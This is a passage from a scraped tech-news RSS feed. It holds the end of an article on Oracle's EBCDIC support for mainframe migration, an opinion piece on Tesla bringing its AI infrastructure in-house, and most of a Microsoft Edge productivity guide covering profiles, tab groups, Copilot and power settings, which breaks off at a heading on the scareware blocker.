<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/matt-kimball/" target="_blank" rel="noreferrer noopener">Matt Kimball</a>, VP and principal analyst with Moor Insights &amp; Strategy, also saw the Oracle move as a good one, but stressed that while it should make things easier for organizations, re-platforming still won’t be easy because EBCDIC migration isn’t just a character-conversion exercise. However, “Oracle’s built-in character-set support and EBCDIC collations move part of that compatibility burden into the database, making it easier to preserve existing application behavior,” he said. </p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/ishraqkhann/" target="_blank" rel="noreferrer noopener">Ishraq Khan</a>, CEO of coding productivity tool vendor Kodezi, agreed. </p>



<p class="wp-block-paragraph">“One of the biggest obstacles to leaving mainframes is decades of applications built around EBCDIC encoding and legacy data formats. If these compatibility features reduce the amount of code that needs to be rewritten, they can lower migration risk, cost, and implementation time,” Khan said. But, he added, organizations should also consider whether these features simply make migration easier, or make future moves more difficult.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4202975/oracle-simplifies-migrating-legacy-databases-off-ibm-mainframes-with-support-for-ebcdic.html" target="_blank">CIO.com</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lessons from Tesla’s AI strategy]]></title>
<description><![CDATA[For years, the public cloud was the default for new workloads because its convenience, elasticity, and breadth of services made sense. However, as AI’s strategic importance grows, its economics and infrastructure are changing. Tesla is one of the clearest examples of a company deciding that AI is...]]></description>
<link>https://tsecurity.de/de/3699914/ai-nachrichten/lessons-from-teslas-ai-strategy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699914/ai-nachrichten/lessons-from-teslas-ai-strategy/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:50 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For years, the public cloud was the default for new workloads because its convenience, elasticity, and breadth of services made sense. However, as AI’s strategic importance grows, its economics and infrastructure are changing. Tesla is one of the clearest examples of a company deciding that AI is too important, too expensive, and too central to its business to leave largely in the hands of a third-party cloud provider.</p>



<p class="wp-block-paragraph"> At the center of <a href="https://247wallst.com/investing/2026/07/11/forget-ai-hyperscalers-tesla-may-own-the-most-valuable-ai-application/">Tesla’s strategy is a simple idea.</a> If AI is key to how you build your products, run your business, and define your future, the infrastructure that powers AI becomes a strategic asset. It is no longer just plumbing but part of the product itself. Tesla’s models, databases, applications, and workflows increasingly rely on infrastructure that is built, hosted, and managed by Tesla. That means the company has direct control over the hardware, the software stack, data movement, performance tuning, and security posture. For a company that depends on AI to support autonomy, robotics, manufacturing intelligence, and future product direction, that control matters.</p>



<p class="wp-block-paragraph">This is the real heart of the matter. Tesla is not treating AI as a side project or a feature layer added on top of an existing business. AI is central to Tesla now and into the future. It is a force multiplier, but more than that, it is an essential aspect of product development, operational efficiency, automation, and competitive differentiation. Once a company reaches that level of dependence on AI, the conversation around infrastructure changes very quickly.</p>



<p class="wp-block-paragraph">Public cloud is attractive because it provides a complete AI ecosystem on demand. You can provision compute, storage, training environments, managed services, orchestration tools, and deployment pipelines without building much yourself. That is why I often call public cloud “the easy button” for AI. It is fast, convenient, and feature-rich. But convenience comes with a premium, and for many companies moving deeply into AI, that premium is becoming very hard to justify.</p>



<h2 class="wp-block-heading">Cost is driving AI out of the cloud</h2>



<p class="wp-block-paragraph">One of the biggest forces driving this shift is price. Many enterprises moving into AI are shocked by what public cloud providers charge for AI infrastructure. Training clusters, inference engines, storage, networking, observability, and support services all add up quickly. What begins as a convenient path to experimentation can become an extremely expensive operating model when AI moves into production at scale.</p>



<p class="wp-block-paragraph">In my experience during the past 15 years, public cloud is often at least twice as expensive as comparable private infrastructure for sustained workloads. That is not true in every case, and it depends heavily on utilization patterns, architecture, and operational maturity. However, for large, predictable, always-on AI workloads, public cloud economics often become difficult to defend. The markup associated with convenience, elasticity, and managed ecosystems is substantial.</p>



<p class="wp-block-paragraph">In response, companies are increasingly exploring alternatives. Some are moving toward <a href="https://www.infoworld.com/article/4140865/neoclouds-run-ai-cheaper-and-better.html">neoclouds </a>that specialize in AI infrastructure. Others are evaluating <a href="https://www.infoworld.com/article/4175895/the-sovereign-cloud-illusion.html">sovereign cloud</a> options for control, locality, or compliance reasons. Many are revisiting <a href="https://www.infoworld.com/article/2291750/what-the-private-cloud-really-means.html">private cloud </a>infrastructure for the most strategic and cost-intensive workloads. Tesla is becoming the poster child for how successful that approach can be when a company has the scale, the sophistication, and the long-term commitment to execute it well.</p>



<h2 class="wp-block-heading">Control, governance, and security</h2>



<p class="wp-block-paragraph">Cost is only one part of the equation. Control is the other major driver. When Tesla runs its AI infrastructure on equipment it owns and operates, it gains much tighter control over performance, data handling, workload placement, governance models, and operational priorities. That matters a great deal when the workloads involved are mission-critical and directly connected to the future of the company.</p>



<p class="wp-block-paragraph">A privately controlled AI environment can provide better <a href="https://www.csoonline.com/article/568841/what-is-information-security-definition-principles-and-jobs.html">security </a>because the organization has direct oversight of the infrastructure stack. It can provide better governance because data, models, and workflows remain inside systems the enterprise fully controls. It can also improve reliability and performance tuning because engineering teams can optimize specifically for their own AI pipelines rather than adapting to the generalized patterns of a shared cloud environment.</p>



<p class="wp-block-paragraph">Of course, many people are quick to point out that running your own private infrastructure comes with significant labor and cost. They are not wrong. Building and operating private AI infrastructure requires capital, engineering skill, facilities, procurement discipline, operational excellence, and long-term commitment. This is not a shortcut, nor is it easier than public cloud. In many ways, it is harder.</p>



<p class="wp-block-paragraph">However, the point is that for sophisticated companies with large-scale, steady-state AI needs, it can be worth it. Better control, better governance, better security, and ultimately lower cost can justify the additional operational burden.</p>



<h2 class="wp-block-heading">The future of AI infrastructure</h2>



<p class="wp-block-paragraph">What makes Tesla so important in this discussion is that the company chose this route because AI is inseparable from its business strategy. Many other enterprises are heading in this same direction. As AI becomes less experimental and more operational, the infrastructure conversation shifts from convenience to economics, control, and differentiation.</p>



<p class="wp-block-paragraph">Not every company should follow Tesla’s path. Many enterprises are not ready to build, host, and manage their own AI environments. Many lack the scale to justify it. Many still benefit tremendously from the agility of public cloud. But for organizations where AI is becoming central to products, services, and competitive advantage, Tesla’s strategy is increasingly relevant.</p>



<p class="wp-block-paragraph">There are three things every enterprise should think about when considering ownership of its own AI infrastructure:</p>



<ul class="wp-block-list">
<li>First, understand the operational burden in full. Private AI infrastructure requires teams, processes, facilities, and discipline that many organizations underestimate.</li>



<li>Second, know the economics of your workload patterns. If AI demand is large, steady, and strategic, the cost advantages of ownership may be compelling.</li>



<li>Third, think beyond cost alone and focus on control. If AI is core to your future, owning the infrastructure may offer strategic benefits in governance, security, optimization, and long-term independence that public cloud cannot easily match.</li>
</ul>



<p class="wp-block-paragraph">Tesla’s strategy is not for everyone, but it is a persuasive example of what happens when a company decides that AI is too important to rent forever. Public cloud remains the easy button, and for many organizations, that will be enough. But for companies that see AI as fundamental to how they will compete, private infrastructure may turn out to be the smarter choice.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[12 top productivity tips for Microsoft Edge]]></title>
<description><![CDATA[We live and work in browsers. It’s where we spend most of our time — and it’s where we waste most of our time as well. Web browsing is slow, inefficient, and full of time-sapping annoyances.



But it needn’t be that way. You can turn your browser into a lean, mean productivity machine. To do it,...]]></description>
<link>https://tsecurity.de/de/3699920/ai-nachrichten/12-top-productivity-tips-for-microsoft-edge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699920/ai-nachrichten/12-top-productivity-tips-for-microsoft-edge/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:50 +0200</pubDate>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">We live and work in browsers. It’s where we spend most of our time — and it’s where we waste most of our time as well. Web browsing is slow, inefficient, and full of time-sapping annoyances.</p>



<p class="wp-block-paragraph">But it needn’t be that way. You can turn your browser into a lean, mean productivity machine. To do it, just follow these tips for Microsoft Edge in Windows 10 or 11. You’ll learn how to switch between home and work profiles, put idle tabs to sleep to speed up your PC, tap into the power of Microsoft’s Copilot AI assistant, and more.</p>



<p class="wp-block-paragraph">(Note that these tips are written for the most recently updated version of Edge in Windows 11 25H2 and Windows 10 22H2. Things may be slightly different if you use a different Windows version, and not all of these features are available for Edge on macOS or other platforms.)</p>



<p class="wp-block-paragraph">So let’s get started — time’s a-wasting, and so is your productivity.</p>



<h2 class="wp-block-heading">1. Switch between work and personal profiles</h2>



<p class="wp-block-paragraph">With remote and hybrid work models now common, many people use the same device for work and personal use. When it comes to using a web browser, that can quickly become problematic.</p>



<p class="wp-block-paragraph">Mixing work and personal favorites makes it far more difficult to quickly get to important work websites or personal websites. When you’re working, you don’t want to wade through hundreds of links to family photos, vacation destinations, and YouTube videos of cats befriending parrots when you’re just looking for the OSHA website about mine safety regulations. And when you’re off working hours and want to watch a video of a Persian cat nuzzling a cockatiel, a website detailing the GDPs of every country in Europe and Asia is not your primary destination.</p>



<p class="wp-block-paragraph">Different profiles let you completely segregate your browser use. That doesn’t just mean different favorites. It also means different Collections, different extensions, different passwords, and more.</p>



<p class="wp-block-paragraph">Each Edge profile is tied to a different Microsoft account. So to use different profiles, you’ll need to create different Microsoft accounts. To create a new Microsoft account in Windows 10 or 11:</p>



<ol start="1" class="wp-block-list">
<li>Go to <a href="https://account.microsoft.com/" target="_blank" rel="noreferrer noopener">https://account.microsoft.com</a>. If you’re signed in to your account, click your profile icon or initials in the upper-right corner and select <em>Sign out</em>. Close Edge, restart it, and go back to <a href="https://account.microsoft.com/" target="_blank" rel="noreferrer noopener">https://account.microsoft.com/</a>.</li>



<li>Scroll down to the button that says <em>Create an account</em>, click it, and follow the prompts to create a new account.</li>



<li>On the page that appears, click the <em>Sign in</em> button in the middle of the page. On the screen that appears, select the <em>Create one!</em> link, then follow the prompts to create a new account.</li>
</ol>



<p class="wp-block-paragraph">You’ve now got two different Microsoft accounts you can use for Edge. When you log into one of those accounts in Windows, that will be the default account that Edge will use when you browse the web.</p>



<p class="wp-block-paragraph">To switch between the two accounts, you’ll need to add that second account to Edge. To do it:</p>



<ol start="1" class="wp-block-list">
<li>Click the user profile icon at the top right of Edge. On the small pane that appears, select <em>Set up a new profile</em>, then select either <em>Personal</em> or <em>Work or School</em>. </li>



<li>You’ll be sent to a web page in a new instance of Edge. Click the <em>Sign in</em> button at the far right, then select <em>Sign in to sync data</em>.</li>



<li>On the screens that appear, sign in and confirm that you want to proceed.</li>
</ol>



<p class="wp-block-paragraph">Once you’ve done that, you don’t have to log out of your current account and then log into the second account to use it in Edge. Instead, when you want to use the second account, click the user profile icon at the top right of the Edge window. A small pane appears with your current profile at the top. To switch to your other profile, select it in the “Other profiles” section.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ms-edge-productivity-01-profiles.jpg?quality=50&amp;strip=all" alt="screenshot of user profile in edge browser with other profiles listed below" class="wp-image-4200240" width="462" height="541" sizes="auto, (max-width: 462px) 100vw, 462px"><figcaption class="wp-element-caption"><p>To minimize distractions, set up work and personal profiles in Edge.</p>
</figcaption></figure><p class="imageCredit">Preston Gralla / Foundry</p></div>



<p class="wp-block-paragraph">You’ll now be sent straight to that profile. When you do that, Edge will open in a new window. So you’ll have both your profiles running simultaneously, each with its own tabs, in two separate windows. (Note that you can set up multiple additional profiles.)</p>



<p class="wp-block-paragraph">You can also tell Edge which profile to use when you visit certain websites. To do it:</p>



<ol class="wp-block-list">
<li>Click the user profile icon in Edge and select <em>Profile settings</em>. (Alternatively, you can click the three-dot icon next to the user profile icon and select <em>Settings &gt; Profiles</em>.)</li>



<li>In the “Profile settings” area, click <em>Profile preferences</em>.</li>



<li>At the bottom of the “Automatic profile switching” section on the page that appears, click <em>Add site</em> next to “Custom site switch.”</li>



<li>On the “Add site” popup, enter a website URL and select the profile you want to switch to for that site.</li>
</ol>



<p class="wp-block-paragraph">Should you decide you want to remove a profile, go to <em>Settings &gt; Profiles</em> and scroll to the “More profiles” section. Click the trash can button next to any profile you want to delete. You can always add it again later using the steps above.</p>



<h2 class="wp-block-heading">2. Get to your most-used sites quickly</h2>



<p class="wp-block-paragraph">Bookmarking and organizing favorites is a great way to manage a large collection of websites, but it’s not that useful if you simply want to get to a frequently used site quickly. Edge has some tricks up its sleeve if you want to get your most-used sites pronto.</p>



<h3 class="wp-block-heading">Add a site to the new tab page</h3>



<p class="wp-block-paragraph">When you open a new tab in Edge, a page appears that shows you news and other items you might be interested in. It’s easy to pin a site to this page so it’s accessible whenever you open a new tab.</p>



<p class="wp-block-paragraph">Look toward the top of the page, just underneath the search box. If you don’t see icons for pinned pages (such as for Yahoo, Amazon, your inbox, and so on), click the settings icon on the upper right of the page (it looks like a gear) and turn “Quick links” on.</p>



<p class="wp-block-paragraph">A row of site icons appears, along with a + icon. Click the + icon and type or paste in the name and URL of the site you want to pin, then click <em>Add</em>. The site will now appear along with the other pinned pages.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ms-edge-productivity-02-quick-links.jpg?quality=50&amp;strip=all&amp;w=1024" alt="screenshot of adding a website to quick links in edge browser" class="wp-image-4200248" width="1024" height="617" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Pinning a site keeps it handy on the new tab page.</p>
</figcaption></figure><p class="imageCredit">Preston Gralla / Foundry</p></div>



<p class="wp-block-paragraph">You can rename or remove any site pinned to the new tab page by clicking the three-dot icon next to the site icon and selecting <em>Rename</em> or <em>Remove</em> from the menu that appears.</p>



<p class="wp-block-paragraph">The new tab page is tied to your current profile, so you can set up different pinned sites on the new tab page for each of your profiles.</p>



<h3 class="wp-block-heading">Pin tabs to the top of Edge</h3>



<p class="wp-block-paragraph">For even faster access to frequently used sites, you can pin them as browser tabs so they appear at the far left of all your other tabs in Edge. When you’re on the site you want to pin as a tab in Edge, right-click its tab and select <em>Pin tab</em> from the menu that appears. The pinned tab will now appear to the left of all your open tabs.</p>



<p class="wp-block-paragraph">The icon for the pinned tab looks smaller than all of your other tabs, and it will persist even after you shut down and restart Edge. If you have multiple pinned tabs, all of them will appear to the left of any non-pinned tabs.</p>



<p class="wp-block-paragraph">Like pinned sites on new tab page, your pinned tabs are unique to each Edge profile; they won’t carry over from profile to profile.</p>



<h3 class="wp-block-heading">Pin sites you often visit to the Windows taskbar</h3>



<p class="wp-block-paragraph">For Windows users, the fastest way to access a frequently used site is to pin it to the Windows taskbar. That means it’s always visible (even when Edge isn’t running), and you can launch it with a single click.</p>



<p class="wp-block-paragraph">When you’re on the site you want to pin, select the three-dot icon at the top right of the browser window and select <em>More tools &gt; Pin to taskbar</em>. A small screen appears with a text box in it with the name of the site. Use the name provided or type a new name into the text box and click <em>Pin</em>.</p>



<h2 class="wp-block-heading">3. Create tab groups for more efficient browsing</h2>



<p class="wp-block-paragraph">If you’re like lots of people, you frequently browse with many tabs open, and find yourself wasting time switching to the tab you want because of all of the clutter.</p>



<p class="wp-block-paragraph">There’s a simple fix: group tabs into categories so you can quickly switch to the tab group that has the tab you want. For example, you might group them into “News,” “Museums,” “Finance,” and so on. Or you could create a tab group for research related to a specific project.</p>



<p class="wp-block-paragraph">To do it, right-click a tab, select <em>Add tab to new group</em>, and then name the tab group. You can then drag other tabs into the group. You can also assign each tab group a unique color so they’re easy to differentiate at a glance.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ms-edge-productivity-03-tab-groups.jpg?quality=50&amp;strip=all&amp;w=1024" alt="screenshot of creating a tab group in edge browser" class="wp-image-4200247" width="1024" height="380" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Creating tab groups makes it easier to find the tab you want quickly.</p>
</figcaption></figure><p class="imageCredit">Preston Gralla / Foundry</p></div>



<p class="wp-block-paragraph">If you’ve already created a group, when you right-click a tab, you’ll see “Add tab to group” rather than “Add tab to new group.” When you click the arrow next to it, you’ll see a list of all your existing groups, so you can easily add it to any of them. You’ll also see “New group,” which will let you create and customize a new group.</p>



<p class="wp-block-paragraph">Once you’ve created a tab group, you can rename it, change its assigned color, add new tabs to it, ungroup the tabs from it, delete the group and all the tabs in it, and more. Just right-click the name of any group and select an option from the menu that appears.</p>



<h2 class="wp-block-heading">4. Enlist a Copilot as you browse</h2>



<p class="wp-block-paragraph">Microsoft’s genAI chatbot, Copilot, has become increasingly integrated with Edge, so much so that Microsoft now calls Edge <a href="https://play.google.com/store/apps/details?id=com.microsoft.emmx&amp;listing=find&amp;hl=en-US&amp;utm_source=copilot.com" target="_blank" rel="noreferrer noopener">an “AI browser.”</a> At the moment, that’s more hype than fact, but it is true that Edge gets new Copilot features added on a regular basis.</p>



<p class="wp-block-paragraph">Edge provides a couple of ways to interact with Copilot, one of which is to open the Copilot sidebar to the right of the main browser window. (We’ll go over the other method later in the story.) Click the Copilot icon at the top right of Edge, and the Copilot pane appears. Here’s where you type in prompts for Copilot.</p>



<p class="wp-block-paragraph">There’s a tremendous amount you can do with Copilot, most of which is beyond the scope of this article. To learn more about what it can do and how to use it, see our story “<a href="https://www.computerworld.com/article/3712249/7-ways-to-use-microsoft-copilot-right.html">9 ways to use Copilot right</a>.”</p>



<p class="wp-block-paragraph">However, here’s one use designed specifically for web browsing: summarizing the contents of the page you’re currently visiting. Depending on the structure and content of the page, Copilot can give a high-level overview of the entire page, provide capsule descriptions of individual articles or sections, and more. You can also ask Copilot to extract specific information from a page, such as all the AI-related information on it, and organize the information into a bulleted digest.</p>



<p class="wp-block-paragraph">To do all that, open a web page and open the Copilot sidebar. You’ll see a few suggested prompts, one of which should be related to summarizing the page, such as <em>Summarize the main points on this page</em> or <em>Create a summary of this page</em>. Click the prompt, or if you don’t see it, type it into the text box at the bottom of the Copilot pane.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ms-edge-productivity-04-copilot-summary.jpg?quality=50&amp;strip=all&amp;w=1024" alt="screenshot of copilot sidebar in edge browser with summary of current web page" class="wp-image-4200244" width="1024" height="552" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Use Copilot to summarize the content on a web page.</p>
</figcaption></figure><p class="imageCredit">Preston Gralla / Foundry</p></div>



<p class="wp-block-paragraph">You can also ask it to summarize the last page you’ve visited. Click the down arrows towards the bottom of the Copilot pane, and you’ll see a listing for the previous page you’ve visited, such as Computerworld.com. Click the text <em>summarize my recent activity on [page]</em> and it will do that for you. Again, if you don’t see that text, type it into the Copilot text box.</p>



<p class="wp-block-paragraph">The summarization feature, though, still has rough edges, or at least it did when I was writing this article. If you leave the web page you’re currently on and go to a new one, the summary of the old page remains, and there isn’t an immediate way to summarize the new one. To get a summary of the new page, you’ll have to scroll to the bottom of the Copilot pane, click the arrow (it will be facing either up or down, depending on whether you’ve previously clicked it) and click “Create a summary of this page.”</p>



<p class="wp-block-paragraph">In that section, you can also click listings of your other open tabs and get summaries of any of them.</p>



<h2 class="wp-block-heading">5. Remove clutter when you launch new tabs</h2>



<p class="wp-block-paragraph">When you create a new tab, the initial page is filled with pinned sites, suggested news stories, widgets, and more. If you find that page distracting, you can change it to a much cleaner, more stripped-down page.</p>



<p class="wp-block-paragraph">If you haven’t pinned specific sites to the row of icons below the search box (see tip #2 above), you can make Edge’s default icons go away: Click the gear icon on the upper right of the page, and a “Page settings” panel pops up. In the “Quick links &amp; search” section, click the dropdown next to “Quick links” and select<em> Off</em>. That gets rid of the icons for web sites just beneath the search box.</p>



<p class="wp-block-paragraph">If you have pinned your own preferred sites there, you’ll want to leave quick links enabled, but you can turn the “Show sponsored links” toggle to <em>Off</em> to get rid of ads.</p>



<p class="wp-block-paragraph">To get rid of the news articles that overwhelm the page, go to the “Show content” area of the panel and move the “Show feed” toggle to <em>Off</em>. Or, if you want to really strip down the page, move the “Show content” toggle to <em>Off</em>. That kills pretty much everything on the page except the weather. If you don’t want to see that either, scroll down a bit more and move the “Weather” toggle to <em>Off</em>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ms-edge-productivity-05-clean-new-tab-page.jpg?quality=50&amp;strip=all&amp;w=1024" alt="screenshot of stripped-down new tab page in edge with page settings pane" class="wp-image-4200243" width="1024" height="773" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Going with the stripped-down new tab look in Edge.</p>
</figcaption></figure><p class="imageCredit">Preston Gralla / Foundry</p></div>



<p class="wp-block-paragraph"> You can also strip out the background graphic for the new tab page by turning off the “Background” toggle. I don’t recommend it, though, because when you do that, you’ll get a gray page with a big Microsoft logo dead center when you launch a new tab.</p>



<h2 class="wp-block-heading">6. Launch Copilot-centered new tabs</h2>



<p class="wp-block-paragraph">If you’re a frequent Copilot user, you might want to take a different approach to the new tab page.</p>



<p class="wp-block-paragraph">The Copilot you get in a side pane when you click the Copilot icon at the top right of Edge is a somewhat stripped-down version of Microsoft’s full-blown Copilot app. If you’re looking to use the full-fledged version, there’s a simple way to do it: Tell Edge to open Copilot every time you open a new tab.</p>



<p class="wp-block-paragraph">To do it, click the three-dot icon to the left of the Copilot icon at the top right of Edge and navigate to <em>Settings &gt; Start, home, and new tab page</em>. In the “New tab page” section, turn on the <em>Copilot new tab page</em> toggle. From then on, every time you open a new tab, you’ll launch a full Copilot screen that’s similar to the standalone Copilot app.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ms-edge-productivity-06-copilot-new-tab-page.jpg?quality=50&amp;strip=all&amp;w=1024" alt="screenshot of copilot new tab page in edge browser" class="wp-image-4200246" width="1024" height="773" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>The Copilot new tab page puts Copilot chat front and center.</p>
</figcaption></figure><p class="imageCredit">Preston Gralla / Foundry</p></div>



<p class="wp-block-paragraph">You’ll see the usual Copilot prompt box front and center, and beneath that, several prompts Microsoft thinks you might want to use. (Note to Microsoft: I’ve never used one of those suggestions even once. I’d guess few other people have either.)</p>



<p class="wp-block-paragraph">What’s really new here are the vertical icons running down the left side of the page. Here’s a brief rundown of what each one does:</p>



<ul class="wp-block-list">
<li><strong>Open sidebar:</strong> Widens the navigation bar and shows a list of your recent chats so you can revisit any of them.</li>



<li><strong>New chat:</strong> Start a new chat with Copilot.</li>



<li><strong>Library:</strong> Build a library of Copilot-created content such as images, reports, podcasts, documents, and more.</li>



<li><strong>Tasks:</strong> Create a Copilot task that automates something you want done, such as sending you a weekly email about a company’s stock price.</li>



<li><strong>Health:</strong> Open Copilot Health, a version of Copilot designed specifically for getting health information.</li>



<li><strong>Shopping:</strong> Use Copilot as a shopping assistant.</li>



<li><strong>Imagine:</strong> Create or edit an image using Copilot.</li>



<li><strong>Experiments:</strong> Discover and use new Copilot features that Microsoft is testing but that may or may not be officially launched at some point.</li>
</ul>



<p class="wp-block-paragraph">Clicking the Copilot icon at the top of the list of vertical icons returns you to the main Copilot interface you get when you launch a new tab.</p>



<p class="wp-block-paragraph">As you can see, many of these new Copilot functions are aimed at consumers and unlikely to be useful in a business setting. Still, if you frequently turn to Copilot for help, you might find the Copilot new tab page a good alternative to the standard new tab page.</p>



<p class="wp-block-paragraph">And note that setting up the Copilot new tab page doesn’t prevent you from browsing or searching the web normally. Just enter the search term or website you want to visit in the address bar at the top of the screen.</p>



<h2 class="wp-block-heading">7. Put tabs to sleep to conserve system resources and boost battery life</h2>



<p class="wp-block-paragraph">If you’re like most people, you keep multiple tabs open in Edge so you can easily switch among the sites, web apps, and information important to you. It’s a great time-saver.</p>



<p class="wp-block-paragraph">But it can also be a big memory and processor hog, which can slow down both your browsing and your other computing tasks. It needn’t be that way, though. You can put inactive tabs to “sleep” until you need them, freeing up resources, which will make your PC speedier and make its battery last longer, even when you have multiple tabs open. Microsoft claims that putting inactive tabs to sleep reduces memory use by an average of 32% and CPU use by an average of 37%.</p>



<p class="wp-block-paragraph">Here’s how to do it:</p>



<ol start="1" class="wp-block-list">
<li>In Edge, click the three-dot icon on the upper right of the screen and select <em>Settings &gt; System and Performance &gt; Performance</em>.</li>



<li>In the “Memory” section, move the slider to On next to <em>Automatically put tabs to sleep</em>.</li>



<li>To change the length of time it takes to put an inactive tab to sleep, below “Automatically put tabs to sleep” click the drop-down arrow and select a time. Your choice is anywhere from 30 seconds to 12 hours.</li>
</ol>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ms-edge-productivity-07-sleep-tabs.jpg?quality=50&amp;strip=all" alt="screenshot of edge browser settings with options for putting tabs to sleep" class="wp-image-4200238" width="914" height="705" sizes="auto, (max-width: 914px) 100vw, 914px"><figcaption class="wp-element-caption"><p>Putting tabs to sleep can significantly reduce CPU and memory use.</p>
</figcaption></figure><p class="imageCredit">Preston Gralla / Foundry</p></div>



<p class="wp-block-paragraph">To reawaken any tab that’s been put to sleep, simply click on it, and it will resume normal activity.</p>



<p class="wp-block-paragraph">There’s a chance that some sites might not work properly after they’ve been put to sleep. If that happens to you, you can tell Edge never to put that site to sleep again. To do it, scroll up to the “General” area on the “System and performance / Performance” page of Settings. Click the <em>Add site</em> button next to the “Always keep these sites active” item and paste in the URL of any site you don’t want to sleep.</p>



<h2 class="wp-block-heading">8. Reduce power use with ‘energy saver’</h2>



<p class="wp-block-paragraph">Browsers can be power hogs, especially if you have multiple tabs open and are playing videos or music in them. That can be a particular problem if you’re using a laptop that isn’t plugged into a power source.</p>



<p class="wp-block-paragraph">In Edge, the “energy saver” setting reduces the amount of system resources the browser uses, which extends your PC’s battery life. If you enable energy saver, it becomes active when your laptop is unplugged. <a href="https://www.microsoft.com/en-us/edge/features/efficiency-mode?form=MA13FJ" target="_blank" rel="noreferrer noopener">Microsoft claims</a> energy saver can give you on average an extra 25 minutes of battery life. To use it:</p>



<ol start="1" class="wp-block-list">
<li>In Edge, click the three-dot icon on the upper right of the screen and select <em>Settings &gt; System and Performance &gt; Performance</em>.</li>



<li>In the “Power” section, make sure the toggle next to “Enable energy saver” is turned on. When you do that, you see two options: “Balanced” and “Maximum savings.”</li>



<li>Select <em>Balanced</em> if you want your laptop to go into a lower-power mode to save battery life when your laptop is unplugged or has a low battery. Select <em>Maximum savings</em> if you know you’re not going to be able to plug your laptop in for some time. Note that in this mode, your video quality may be affected.</li>
</ol>



<p class="wp-block-paragraph">There’s also a separate option to use energy saver even if your laptop is plugged in. Use this option if you want to consume less energy when you use your computer. Note that if you use it, you may experience slowdowns when browsing the web.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ms-edge-productivity-08-energy-saver.jpg?quality=50&amp;strip=all&amp;w=1024" alt="screenshot of power settings in edge browser with energy saver enabled" class="wp-image-4200245" width="1024" height="412" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>You can get an extra 25 minutes of battery life with the energy saver setting, Microsoft claims.</p>
</figcaption></figure><p class="imageCredit">Preston Gralla / Foundry</p></div>



<h2 class="wp-block-heading">9. View and mark up PDFs</h2>



<p class="wp-block-paragraph">With Edge, there’s no need to launch a separate application when you want to read or mark up a PDF; its built-in PDF app is quite good. With it, you can draw on and highlight sections of the PDF and erase the marks you made as well. So save yourself time and use Edge rather than third-party software.</p>



<p class="wp-block-paragraph">You don’t need to do anything to read a PDF online. Simply click it, and by default it will launch in Edge’s reader. You’ll find the markup tools, including for drawing, highlighting, and erasing, in a toolbar towards the top of the screen. To open a PDF from your hard disk, when you’re in Edge, press Ctrl-O, then navigate to the PDF and click it.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ms-edge-productivity-09-pdf-reader.jpg?quality=50&amp;strip=all" alt="screenshot of pdf editing tools in edge browser" class="wp-image-4200241" width="801" height="582" sizes="auto, (max-width: 801px) 100vw, 801px"><figcaption class="wp-element-caption"><p>Edge has a surprisingly useful PDF viewer with markup tools.</p>
</figcaption></figure><p class="imageCredit">Preston Gralla / Foundry</p></div>



<p class="wp-block-paragraph">If you prefer to use your own PDF reader, even for PDFs found online, you might be annoyed that every time you click a PDF, it opens in Edge’s PDF reader. You can change that, though, by changing your default PDF reader.</p>



<p class="wp-block-paragraph">In Windows Settings, select <em>Apps &gt; Default Apps</em> and in the search box at the top of the screen just below “Set a default for a file type or link type,” type in <strong>.pdf</strong>. After you do that, the listing “Microsoft Edge Microsoft Edge PDF document” appears. Click it, and a screen appears showing you all the applications on your PC that can read PDFs. Select the one you want to use instead of Edge.</p>



<h2 class="wp-block-heading">10. Turn on Edge’s AI-powered ‘scareware’ blocker</h2>



